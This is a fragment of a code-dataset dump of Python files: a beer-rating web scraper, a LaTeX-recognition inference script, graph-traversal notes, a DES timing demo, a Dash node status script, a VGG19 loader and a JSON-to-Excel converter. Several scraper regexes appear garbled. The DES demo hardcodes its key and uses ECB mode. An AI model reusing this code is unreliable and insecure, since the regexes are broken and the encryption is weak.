"line_number": 51, "usage_type": "call"}, {"api_name": 
"time.time", "line_number": 65, "usage_type": "call"}, {"api_name": "model.train", "line_number": 69, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 77, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "eval.calculate_speed_error", "line_number": 106, "usage_type": "call"}, {"api_name": "eval.calculate_accuracy", "line_number": 107, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 132, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 148, "usage_type": "call"}, {"api_name": "model.state_dict", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 154, "usage_type": "call"}, {"api_name": "model.state_dict", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path", "line_number": 154, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 159, "usage_type": "attribute"}, {"api_name": "data.get_loaders", "line_number": 161, "usage_type": "call"}, {"api_name": "model.RacingNet", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.optim.AdamW", "line_number": 166, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 166, "usage_type": "attribute"}, {"api_name": "model.parameters", "line_number": 166, "usage_type": "call"}]} +{"seq_id": "19167007165", "text": "import sys\nimport os\nimport unittest\nimport urllib2\nimport re\nimport logging\nimport datetime\n\nfrom Review import Review\n\nclass Beer(object):\n \"\"\"\n metadata around a beer, and it's ratings\n \"\"\"\n beer_uri = \"http://www.ratebeer.com/beer/beer_name/{beer_id}/\"\n ratings_uri = \"http://www.ratebeer.com/Ratings-Who.asp?BeerID={beer_id}\"\n ratings_regex = re.compile(r'\\d*)\" target=\"_blank\">(.*?) \\(Rating - (.*?)\\)')\n\n reviews_regex = re.compile(r'
\\d\\.?\\d?) out of 5\\.0\">(?P=rating)
   AROMA (\\d\\d?)/10   APPEARANCE (\\d)/5   TASTE (\\d\\d?)/10   PALATE (\\d)/5   OVERALL (\\d\\d?)/20(\\S*?) \\(\\d*?\\)
- (.*?) - ([A-Z]{3} \\d\\d?, \\d{4}).*?
(.*?)

', flags=re.DOTALL)\n\n get_metadata = {'name': re.compile(r'
(.*?)
'),\n 'abv': re.compile(r'ABV: (.*?)%'),\n 'mean': re.compile(r'MEAN: (\\d\\.?\\d?)/5\\.0') ,\n 'weighted_score': re.compile(r'WEIGHTED AVG: \\d\\.?\\d*?/5'),\n 'overall_percentile': re.compile(r'
'),\n 'style_percentile': re.compile(r'
'),\n 'total_ratings': re.compile(r'RATINGS: (\\d+)'),\n 'brewery_and_style': re.compile(r'
(?:Brewed by )?.*?(?:
Brewed at .*)?

Style: .*?
.*?
')}\n def __init__(self, beer_uid, name=None, abv=None, mean_score=None, overall_percentile=None,\n style_percentile=None, total_ratings=None, brewery_id=None):\n self.uid = int(beer_uid)\n self.name = name\n if abv:\n self.abv = float(abv)\n if mean_score:\n self.mean_score = float(mean_score)\n if overall_percentile:\n self.overall_percentile=float(overall_percentile)\n if style_percentile:\n self.style_percentile=float(style_percentile)\n if total_ratings:\n self.total_ratings=int(total_ratings)\n if brewery_id:\n self.brewery_id=int(brewery_id)\n def __str__(self):\n return \"'{0}' from {1}\".format(self.name, Beer.beer_uri.format(beer_id=self.uid))\n\n def fetch_beer_page(self, page=None):\n \"\"\"\n returns html string of the beer page\n \"\"\"\n if page:\n #logging.debug('opening ' + Beer.beer_uri.format(beer_id=self.uid)+'1/{0}/'.format(page))\n return urllib2.urlopen(Beer.beer_uri.format(beer_id=self.uid)+'1/{0}/'.format(page)).read()\n else:\n logging.debug('opening ' + Beer.beer_uri.format(beer_id=self.uid))\n return urllib2.urlopen(Beer.beer_uri.format(beer_id=self.uid)).read()\n\n def parse_metadata(self, raw_page=None):\n \"\"\"\n scrapes the beer metadata out of a beer's raw_page string\n Note! overrides existing metadata,\n catches non-existance for abv and mean score as these aren't on every beer page\n \"\"\"\n if not raw_page:\n raw_page = self.fetch_beer_page()\n self.name = Beer.get_metadata['name'].findall(raw_page)[0]\n try:\n self.abv = float(Beer.get_metadata['abv'].findall(raw_page)[0])\n except IndexError:\n logging.warning(\"unable to find abv for beer {0}\".format(self.uid))\n self.abv = None\n try:\n self.mean_score = float(Beer.get_metadata['mean'].findall(raw_page)[0])\n except IndexError:\n logging.warning(\"unable to find mean score for beer {0}\".format(self.uid))\n self.mean_score = None\n try:\n self.weighted_score = float(Beer.get_metadata['weighted_score'].findall(raw_page)[0])\n except IndexError:\n logging.warning(\"unable to find weighted score for beer {0}\".format(self.uid))\n self.weighted_score = None\n try:\n self.overall_percentile=float(Beer.get_metadata['overall_percentile'].findall(raw_page)[0])\n except IndexError:\n logging.warning(\"unable to find overall percentile for beer {0}\".format(self.uid))\n self.overall_percentile = None\n try:\n self.style_percentile=float(Beer.get_metadata['style_percentile'].findall(raw_page)[0])\n except IndexError:\n logging.warning(\"unable to find style_percentile for beer {0}\".format(self.uid))\n self.style_percentile = None\n self.total_ratings=int(Beer.get_metadata['total_ratings'].findall(raw_page)[0])\n self.brewery_id=int(Beer.get_metadata['brewery_and_style'].findall(raw_page)[0][0])\n try:\n self.style_id=int(Beer.get_metadata['brewery_and_style'].findall(raw_page)[0][1])\n except IndexError:\n logging.warning(\"unable to find style_id for beer {0}\".format(self.uid))\n self.style_id = None\n def fetch_rating_page(self):\n \"\"\"\n returns the html string of the minimized rating list\n \"\"\"\n return urllib2.urlopen(Beer.ratings_uri.format(beer_id=self.uid)).read()\n\n def scrape_user_rating_list(self, raw_page=None):\n \"\"\"\n scrapes the minimized user comment list (basically just ratings),\n creating a list of tuples in self.ratings where each tuple takes the form\n (username, userID, beerRating)\n username is a str, userID an int, and beerRating a float\n the prime advantage of this over scrape_user_comment_list is that it\n takes only one http GET to fetch this entire list, while 
gathering full\n comments and ratings by beer takes N/10 GETs where N is the number of\n comments (though there may be undocumented means of increasing the page size)\n \"\"\"\n if not raw_page:\n raw_page = self.fetch_rating_page()\n self.ratings = [(username, int(userID), float(beerRating))\n for (userID, username, beerID, beerRating) in Beer.ratings_regex.findall(raw_page)]\n\n def scrape_user_comment_list(self, raw_page=None):\n if not raw_page:\n raw_page = self.fetch_beer_page()\n self.reviews = []\n try:\n self.total_ratings\n except AttributeError:\n self.parse_metadata(raw_page)\n page = 1\n while len(self.reviews) < self.total_ratings:\n if page != 1:\n raw_page = self.fetch_beer_page(page=page)\n self.reviews +=[Review(beer_uid=self.uid, user_uid=int(user_id),\n brewery_uid =self.brewery_id, topline_score=float(topline_score),\n aroma_score=int(aroma), apperance_score=int(apperance),\n taste_score=int(taste), palete_score=int(palete),\n overall_score=int(overall), user_loc=user_loc,\n date = datetime.datetime.strptime(date_str, '%b %d, %Y').date(),\n comment = comment) for (topline_score, aroma, apperance,\n taste, palete, overall, user_id, user_name, user_loc,\n date_str, comment) in \\\n Beer.reviews_regex.findall(raw_page)]\n page += 1\n if page-1 > self.total_ratings/8.0:\n logging.error('parsing should have completed, but did not, forcing.')\n break\n\nclass BeerTests(unittest.TestCase):\n def setUp(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "gearmonkey/consume-rBeer", "sub_path": "src/Beer.py", "file_name": "Beer.py", "file_ext": "py", "file_size_in_byte": 9449, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "re.compile", "line_number": 17, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 19, "usage_type": "call"}, {"api_name": "re.DOTALL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 21, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 22, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 23, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 24, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 25, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 26, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 28, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 54, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 56, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 71, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 81, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 86, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 91, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 98, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 104, "usage_type": "call"}, {"api_name": "Review.Review", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 139, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 
146, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 149, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 155, "usage_type": "call"}]} +{"seq_id": "24062637809", "text": "import os\nimport cv2\nfrom datetime import datetime\nimport numpy as np\n# import argparse\nimport torch\nfrom time import process_time\nimport json\nfrom tqdm import tqdm\n \n\nfrom .utils import load_config, load_checkpoint\nfrom .infer.Backbone import Backbone\nfrom .dataset import Words\nfrom .utils import updata_lr, Meter, cal_score\nfrom .dataset import get_dataset\n\nfrom difflib import SequenceMatcher\n\n\n\ndef Make_inference(checkpointFolder,wordsPath,configPath,checkpointPath,device,imagePath='data/Base_soma_subtracao/val/val_images',labelPath='data/Base_soma_subtracao/val/val_labels.txt', date= \"12/12/2012 12:12:12.121212\"):\n #parser = argparse.ArgumentParser(description='Spatial channel attention')\n #parser.add_argument('--config', default='./checkpoints/model_1/config.yaml', type=str, help='配置文件路径')\n #parser.add_argument('--image_path', default='data/DataBase/test/test_images', type=str, help='测试image路径')\n #parser.add_argument('--image_path', default='data/new_test/images', type=str, help='测试image路径')\n #parser.add_argument('--image_path', default='data/Base_soma_subtracao/val/val_images', type=str, help='')\n #parser.add_argument('--label_path', default='data/DataBase/test/test_labels.txt', type=str, help='测试label路径')\n #parser.add_argument('--label_path', default='data/new_test/labels.txt', type=str, help='测试label路径')\n #parser.add_argument('--label_path', default='data/Base_soma_subtracao/val/val_labels.txt', type=str, help='')\n #args = parser.parse_args()\n\n \n\n if not configPath:\n print('请提供config yaml路径!')\n exit(-1)\n\n \"\"\"加载config文件\"\"\"\n params = load_config(configPath)\n\n\n # device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n # device = 'cpu'\n params['device'] = device\n\n #words = Words(params['word_path'])\n words = Words(wordsPath)\n params['word_num'] = len(words)\n params['struct_num'] = 7\n params['words'] = words\n params['word_path'] = wordsPath\n\n params['checkpoint'] = checkpointPath\n\n model = Backbone(params)\n model = model.to(device)\n\n # load_checkpoint(model, None, params['checkpoint'])\n state = torch.load(params['checkpoint'], map_location='cpu')\n\n model.load_state_dict(state['model'])\n\n model.eval()\n\n # train_loader, eval_loader = get_dataset(params)\n\n # loss_meter_eval, word_right_eval, struct_right_eval, exp_right_eval = eval(params= params,model= model)\n\n\n word_right, node_right, exp_right, length, cal_num = 0, 0, 0, 0, 0\n\n with open(labelPath) as f:\n labels = f.readlines()\n\n def convert(nodeid, gtd_list):\n isparent = False\n child_list = []\n for i in range(len(gtd_list)):\n if gtd_list[i][2] == nodeid:\n isparent = True\n child_list.append([gtd_list[i][0],gtd_list[i][1],gtd_list[i][3]])\n if not isparent:\n return [gtd_list[nodeid][0]]\n else:\n if gtd_list[nodeid][0] == '\\\\frac':\n return_string = [gtd_list[nodeid][0]]\n for i in range(len(child_list)):\n if child_list[i][2] == 'Above':\n return_string += ['{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] == 'Below':\n return_string += ['{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] == 'Right':\n return_string += convert(child_list[i][1], gtd_list)\n for i in range(len(child_list)):\n if 
child_list[i][2] not in ['Right','Above','Below']:\n return_string += ['illegal']\n \n #TESTE--------------------------\n elif gtd_list[nodeid][0] == '\\\\overset':\n \n return_string = [gtd_list[nodeid][0]]\n for i in range(len(child_list)):\n if child_list[i][2] == 'Sup':\n return_string += ['{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] == 'Below':\n return_string += ['{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] == 'Right':\n return_string += convert(child_list[i][1], gtd_list)\n for i in range(len(child_list)):\n if child_list[i][2] not in ['Right','Sup','Below']:\n return_string += ['illegal']\n #-------------------------------\n else:\n return_string = [gtd_list[nodeid][0]]\n for i in range(len(child_list)):\n if child_list[i][2] in ['l_sup']:\n return_string += ['['] + convert(child_list[i][1], gtd_list) + [']']\n for i in range(len(child_list)):\n if child_list[i][2] == 'Inside':\n return_string += ['{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] in ['Sub','Below']:\n return_string += ['_','{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] in ['Sup','Above']:\n return_string += ['^','{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] in ['Right']:\n return_string += convert(child_list[i][1], gtd_list)\n return return_string\n\n\n with torch.no_grad():\n bad_case = {}\n pred_times={}\n word_right={}\n inferences_awnser={}\n pred_time_mean = 0\n word_right_mean = 0\n pred_time_std = 0\n word_right_std = 0\n\n \n for item in tqdm(labels):\n name, *label = item.split()\n label = ' '.join(label)\n #if name.endswith('.jpg'):\n # name = name.split('.')[0]\n img = cv2.imread(os.path.join(imagePath, name))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n dim = (150, 150)\n img = cv2.resize(img, (dim), interpolation=cv2.INTER_AREA)\n\n image = torch.Tensor(img) / 255\n image = image.unsqueeze(0).unsqueeze(0)\n\n image_mask = torch.ones(image.shape)\n image, image_mask = image.to(device), image_mask.to(device)\n\n #medir tempo\n pred_start = process_time()\n prediction = model(image, image_mask)\n pred_end = process_time()\n \n pred_time = pred_end-pred_start\n pred_times[name]=pred_time\n #medir tempo\n\n latex_list = convert(1, prediction)\n latex_string = ' '.join(latex_list)\n\n \n # print(latex_string)\n # cv2.imshow('image', img)\n #\n # cv2.waitKey()\n\n\n if latex_string == label.strip():\n print(\"ACERTOU!\")\n exp_right += 1\n inferences_awnser[name]=(latex_string + \" ---> V\")\n else:\n print(\"ERROU!\")\n inferences_awnser[name]=(latex_string + \" ---> X\")\n bad_case[name] = {\n 'label': label,\n 'predi': latex_string,\n 'list': prediction\n }\n #Word_right-------------------------\n\n latex_prediction_list = latex_string.split() \n label_list = label.strip().split()\n\n print(\"latex_prediction_list: \" + str(latex_prediction_list))\n print(\"label_list: \" + str(label_list))\n\n word_right_ratio = SequenceMatcher(None,latex_string,label.strip(),autojunk=False).ratio()\n print(\"word_right_ratio: \" + str(word_right_ratio))\n\n word_right[name]=word_right_ratio\n #-----------------------------------\n\n pred_time_mean = np.array(list(pred_times.values())).mean()\n word_right_mean = np.array(list(word_right.values())).mean()\n exp_rate = exp_right / len(labels)\n pred_time_std = 
np.array(list(pred_times.values())).std()\n word_right_std = np.array(list(word_right.values())).std()\n \n\n #CRIAR PASTA\n # inferences_directory = os.path.join(checkpointFolder,\"inferences -\" + str(date))\n # if not os.path.exists(inferences_directory):\n # os.makedirs(inferences_directory)\n # #print(str(inferences_awnser))\n # with open(os.path.join(inferences_directory,\"prediction times - mean \"+str(pred_time_mean).replace(\".\",\",\")+\"s.txt\"),\"w+\", encoding='UTF8') as f:\n # f.write(str(pred_times))\n # f.close()\n # with open(os.path.join(inferences_directory,\"inferences - exp_rate- \"+str(exp_rate).replace(\".\",\",\")+\".txt\"),\"w+\", encoding='UTF8') as g:\n # g.write(str(inferences_awnser))\n # g.close()\n\n with open('bad_case.json', 'w') as f:\n json.dump(bad_case, f, ensure_ascii=False)\n\n return exp_rate, pred_time_mean, word_right_mean, pred_time_std, word_right_std, device, params[\"experiment\"]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "multi-megaman/Train_and_infer", "sub_path": "SAN/for_mass_inference.py", "file_name": "for_mass_inference.py", "file_ext": "py", "file_size_in_byte": 9515, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.load_config", "line_number": 40, "usage_type": "call"}, {"api_name": "dataset.Words", "line_number": 48, "usage_type": "call"}, {"api_name": "infer.Backbone.Backbone", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 138, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 149, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path", "line_number": 154, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 155, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 155, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 158, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 158, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 163, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 167, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 169, "usage_type": "call"}, {"api_name": "difflib.SequenceMatcher", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 215, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 231, "usage_type": "call"}]} +{"seq_id": "17682608721", "text": "\"\"\"\nGraph Traversal - Algorithm to visit every vertex of a graph\n\nExplorer that continues to explore new vertices as we see them until we hit a dead end in which case\nyou'll retrace your steps and continue exploration.\n\nDepth-first = Stack - LIFO\nDepth = long - vertical before horizontal\n1.) Pre-order - O(n)\n2.) In-order - O(n)\n3.) Post-order - O(n)\n\"\"\"\n\n# Pre-order tree traversal\n'1.) Visit node'\n'2.) Traverse left'\n'3.) 
Traverse right'\n\n\"\"\"\nPseudocode\n\npreorder(node)\n if node == null then return\n visit(node)\n preorder(node.left)\n preorder(node.right)\n\"\"\"\n\n# In-order tree traversal\n\n'1.) Traverse left'\n'2.) Visit node'\n'3.) Traverse right'\n\n\"\"\"\nPseudocode\n\ninorder(node)\n if node == null then return\n inorder(node.left)\n visit(node)\n inorder(node.right)\n\"\"\"\n\n# Post-order tree traversal\n\n'1.) Traverse left'\n'2.) Traverse right'\n'3.) Visit node'\n\n\"\"\"\nPseudocode\n\npostorder(node)\n if node == null then return\n postorder(node.left)\n postorder(node.right)\n visit(node)\n\"\"\"\n\n\nfrom collections import deque\n\n\ngraph = {\n 'A' : ['B', 'G'],\n 'B' : ['C', 'D', 'E'],\n 'C' : [],\n 'D' : [],\n 'E' : ['F'],\n 'F' : [],\n 'G' : ['H'],\n 'H' : ['I'],\n 'I' : []\n}\n\ndef dfs(graph, node):\n visited = []\n stack = deque()\n\n visited.append(node)\n stack.append(node)\n\n while stack:\n s = stack.pop()\n print(s, end=' ')\n\n for n in reversed(graph[s]):\n if n not in visited:\n visited.append(n)\n stack.append(n)\n\n\ndef dfs(al):\n stack = ['g']\n visited = []\n\n while stack:\n node = stack.pop()\n if node not in visited:\n visited.append(node)\n # for x in al[node]:\n # stack.append(x)\n [stack.append(x) for x in al[node]]\n print(visited)", "repo_name": "JuanTGit/practice", "sub_path": "Interview Concepts/DFS.py", "file_name": "DFS.py", "file_ext": "py", "file_size_in_byte": 1823, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.deque", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "3536625087", "text": "from Crypto.Cipher import DES\nfrom Crypto.Util.Padding import pad\nfrom time import *\n\n\ndef des(plaintext):\n \"\"\"\n :param plaintext: plaintext to be encrypted\n :return: encryption time\n \"\"\"\n key = b'a 8b key' # 秘钥长度为8Byte\n begin = time()\n plaintext_pad = pad(plaintext.encode(), 16, style='pkcs7')\n Des = DES.new(key, DES.MODE_ECB) # 生成一个DES对象\n end = time()\n ciphertext = Des.encrypt(plaintext_pad)\n Des = DES.new(key, DES.MODE_ECB)\n decrypt_text = Des.decrypt(ciphertext).decode()\n with open(\"../cipher.txt\", \"a\") as f:\n f.write(\"DES加密:\\n\" + ciphertext.hex() + '\\n')\n f.write(\"DES解密:\\n\" + decrypt_text[:len(plaintext)] + \"\\n\\n\")\n\n return end - begin\n", "repo_name": "hty0111/Cybersecurity-for-Cyber-Physical-Systems", "sub_path": "code/DES.py", "file_name": "DES.py", "file_ext": "py", "file_size_in_byte": 743, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Crypto.Util.Padding.pad", "line_number": 13, "usage_type": "call"}, {"api_name": "Crypto.Cipher.DES.new", "line_number": 14, "usage_type": "call"}, {"api_name": "Crypto.Cipher.DES", "line_number": 14, "usage_type": "name"}, {"api_name": "Crypto.Cipher.DES.MODE_ECB", "line_number": 14, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.DES.new", "line_number": 17, "usage_type": "call"}, {"api_name": "Crypto.Cipher.DES", "line_number": 17, "usage_type": "name"}, {"api_name": "Crypto.Cipher.DES.MODE_ECB", "line_number": 17, "usage_type": "attribute"}]} +{"seq_id": "34673011936", "text": "\"\"\"\nPrints a status line for the dash node to be called from the outside of the container\n\"\"\"\nimport subprocess\nimport json\n\n# Print dashd status\ndef dash_cli(commands):\n \"\"\"Run dash-cli commands\"\"\"\n result = subprocess.run(['dash-cli', '-conf=/dash/dash.conf', 
'--rpcclienttimeout=1'] +\n commands, check=False, capture_output=True, text=True)\n if result.returncode != 0:\n #print(f\"Error running dash-cli. Command: \\ndash-cli {' '.join(commands)}\\nOutput: \\n{result.stderr}\")\n raise Exception(result.stderr)\n return result.stdout.strip()\ntry:\n connectioncount = dash_cli(['getconnectioncount'])\nexcept:\n connectioncount = \"E\"\ntry:\n blocks = json.loads(dash_cli(['getblockchaininfo'])).get('blocks')\nexcept:\n blocks = \"E\"\ntry:\n mn_status = json.loads(dash_cli(['masternode', 'status'])).get('status')\nexcept:\n mn_status = \"-\"\n\nprint(f\"Clients: {connectioncount} \\tBlocks: {blocks} \\tMN: {mn_status}\")\n", "repo_name": "dash-tor/proof-of-concept", "sub_path": "src/status.py", "file_name": "status.py", "file_ext": "py", "file_size_in_byte": 971, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "subprocess.run", "line_number": 10, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 21, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "27604033502", "text": "import tensorflow as tf\nfrom pdb import set_trace\nfrom util import *\nimport numpy as np\nimport scipy.io\n\ndef _conv_layer(input, weights, bias):\n conv = tf.nn.conv2d(input, weights, strides=(1, 1, 1, 1),\n padding='SAME')\n return tf.nn.bias_add(conv, bias)\n\ndef _pool_layer(input):\n return tf.nn.max_pool(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),\n padding='SAME')\n\ndef preprocess(image, mean_pixel):\n return image - mean_pixel\n\ndef undo_preprocess(image, mean_pixel):\n return image + mean_pixel\n\nclass VGG19:\n layers = (\n 'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',\n\n 'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',\n\n 'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',\n 'relu3_3', 'conv3_4', 'relu3_4', 'pool3',\n\n 'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',\n 'relu4_3', 'conv4_4', 'relu4_4', 'pool4',\n\n 'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',\n 'relu5_3', 'conv5_4', 'relu5_4'\n )\n\n def __init__(self):\n data = scipy.io.loadmat('imagenet-vgg-verydeep-19.mat')\n\n self.mean_pixel = np.array([123.68, 116.779, 103.939])\n\n self.weights = data['layers'][0]\n\n def load_weights(self):\n self.net = {}\n for i, name in enumerate(self.layers):\n kind = name[:4]\n if kind == 'conv':\n kernels = self.weights[i][0][0][2][0][0]\n bias = self.weights[i][0][0][2][0][1]\n\n # matconvnet: weights are [width, height, in_channels, out_channels]\n # tensorflow: weights are [height, width, in_channels, out_channels]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n bias = bias.reshape(-1)\n self.net['{}_kernel'.format(name)] = tf.Variable(kernels, \\\n name='{}_kernel'.format(name))\n self.net['{}_bias'.format(name)] = tf.Variable(bias, \\\n name='{}_bias'.format(name))\n\n def preprocess(self, image):\n return image-self.mean_pixel\n\n def undo_preprocess(self, image):\n return image+self.mean_pixel\n\n def feed_forward(self, input_image, scope='VGGController'):\n net = {}\n\n with tf.name_scope('%s_preprocess' % scope):\n current = self.preprocess(input_image)\n\n with tf.variable_scope(scope):\n for i, name in enumerate(self.layers):\n kind = name[:4]\n if kind == 'conv':\n kernels = self.net['{}_kernel'.format(name)]\n bias = self.net['{}_bias'.format(name)]\n current = _conv_layer(current, kernels, bias)\n elif kind == 'relu':\n current = tf.nn.relu(current)\n elif kind == 
'pool':\n current = _pool_layer(current)\n net[name] = current\n\n return net\n", "repo_name": "darshanthaker/kShotActionRecognition", "sub_path": "src/vgg19.py", "file_name": "vgg19.py", "file_ext": "py", "file_size_in_byte": 2924, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.nn.conv2d", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.bias_add", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.max_pool", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 13, "usage_type": "attribute"}, {"api_name": "scipy.io.io.loadmat", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.io.io", "line_number": 39, "usage_type": "attribute"}, {"api_name": "scipy.io", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 82, "usage_type": "attribute"}]} +{"seq_id": "6679906165", "text": "import json\nimport xlwt\n\n\ndef read_text():\n with open(\"numbers.txt\", encoding='UTF-8') as f:\n return f.read()\n\n\ndef write_excel(infos: dict):\n workbook = xlwt.Workbook()\n worksheet = workbook.add_sheet('numbers')\n\n for row_index,row in enumerate(infos):\n for column_index,column_value in enumerate(row):\n worksheet.write(row_index, column_index, label=column_value)\n\n workbook.save(\"numbers.xls\")\n\n\nif __name__ == \"__main__\":\n text = read_text()\n infos = json.loads(text)\n print(infos)\n write_excel(infos)\n", "repo_name": "Sesshoumaru/python-exercise", "sub_path": "0016/0016.py", "file_name": "0016.py", "file_ext": "py", "file_size_in_byte": 558, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "xlwt.Workbook", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "7826214759", "text": "'''\r\nThe model is designed to practice transfer learning and data augment.\r\nThe reason why I imported 'os' is about a mistake of the package 'h5py'.\r\nAlthough I had searched and tried tons of ways to fix it, it was still there.\r\n\r\nAfter reading passages from the Internet, I think there should be two ways to\r\nimply transfer learning.\r\n\r\nThe first way is you utilize a well-defined model like VGG16 to get an initial output.\r\nThen taking the output as an input, you will define your own model and train this 